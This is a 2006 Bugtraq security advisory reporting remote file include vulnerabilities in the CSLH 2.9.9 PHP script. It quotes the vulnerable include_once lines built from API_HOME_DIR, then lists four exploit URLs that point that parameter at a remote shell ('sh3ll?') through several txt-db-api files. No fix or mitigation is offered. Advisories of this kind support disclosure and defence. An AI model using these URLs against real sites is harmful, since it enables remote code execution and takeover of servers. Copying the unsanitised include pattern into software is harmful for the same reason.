[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061024153340.31473.qmail@securityfocus.com>
Date: 24 Oct 2006 15:33:40 -0000
From: crackers_child@...ersavascilar.com
To: bugtraq@...urityfocus.com
Subject: CSLH2.9.9 Remote File Include Vulnerabilities
#########################################################
CSLH2.9.9 Remote File Include Vulnerabilities
#########################################################
By Crackers_Child
crackers_child@...ersavascilar.com
www.sibersavacilar.com
#########################################################
Download Script
http://craftysyntax.com/CSLH2.9.9.zip
#########################################################
#########################################################
Bug
include_once(API_HOME_DIR . "util.php");
include_once(API_HOME_DIR . "const.php");
include_once(API_HOME_DIR . "stringparser.php");
#########################################################
Exploit
#########################################################
www.site.com/CSLH2_path/txt-db-api/stringparser.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/sql.php?API_HOME_DIR=sh3ll?
www.site.com/CSLH2_path/txt-db-api/resultset.php?API_HOME_DIR=sh3ll?
#########################################################
Greetz:All My Friends !
#########################################################
Powered by blists - more mailing lists